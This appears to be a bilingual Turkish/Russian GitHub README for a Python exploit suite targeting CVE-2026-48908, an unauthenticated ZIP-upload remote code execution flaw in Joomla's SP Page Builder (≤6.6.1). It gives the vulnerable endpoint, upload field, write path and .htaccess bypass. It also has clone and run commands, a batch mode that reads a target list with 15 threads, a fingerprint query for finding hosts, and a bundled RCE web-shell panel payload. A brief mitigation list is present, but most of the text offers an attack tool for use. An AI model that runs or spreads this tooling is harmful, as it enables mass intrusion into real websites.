
Python-набор эксплойтов для CVE-2026-48908 — неаутентифицированного RCE через загрузку ZIP в Joomla SP Page Builder (<=6.6.1), с фингерпринтингом, пакетным режимом и полезной нагрузкой для RCE-панели.
SP Page Builder (Joomla) — Kimlik doğrulamasız ZIP yükleme → RCE
| Ürün | SP Page Builder — com_sppagebuilder (JoomShaper) |
| Sürüm | ≤ 6.6.1 |
| Fixed | 6.6.2+ — upload artık admin ister |
| Auth | Unauthenticated |
| Vektör | POST …&task=asset.uploadCustomIcon |
| Field | custom_icon (icon-font ZIP) |
| Yazılan yer | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| Bypass | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/ → PHP execution kapat.htaccess engellecustom_icon ZIP POST rate-limitgit clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| Dosya | Görev |
|---|---|
winrarzips_brand.py | CMD banner (by winrarzips) |
sppb48908_core.py | Exploit motoru |
CVE-2026-48908-Suite.py | Batch + tek hedef CLI |
CVE-2026-48908.py | Tek hedef wrapper |
payloads/x7-panel.php | RCE panel |
requirements.txt | Bağımlılıklar |
❌ Hedef listesi, tarama sonucu ve panel URL'leri repo'da yok.
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed
SP Page Builder (Joomla) — загрузка ZIP без аутентификации → RCE
| Продукт | SP Page Builder — com_sppagebuilder (JoomShaper) |
| Уязвимые версии | ≤ 6.6.1 |
| Исправлено | 6.6.2+ — загрузка требует прав администратора |
| Аутентификация | Не требуется |
| Вектор | POST …&task=asset.uploadCustomIcon |
| Поле | custom_icon (ZIP с icon-font) |
| Путь записи | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| Обход | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/.htaccesscustom_icongit clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| Файл | Назначение |
|---|---|
winrarzips_brand.py | CMD-баннер (by winrarzips) |
sppb48908_core.py | Ядро эксплойта |
CVE-2026-48908-Suite.py | CLI для пакетной и одиночной цели |
CVE-2026-48908.py | Обёртка для одиночной цели |
payloads/x7-panel.php | Полезная нагрузка RCE-панели |
requirements.txt | Зависимости |
❌ Списки целей, результаты сканирования и URL активных панелей не включены.
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed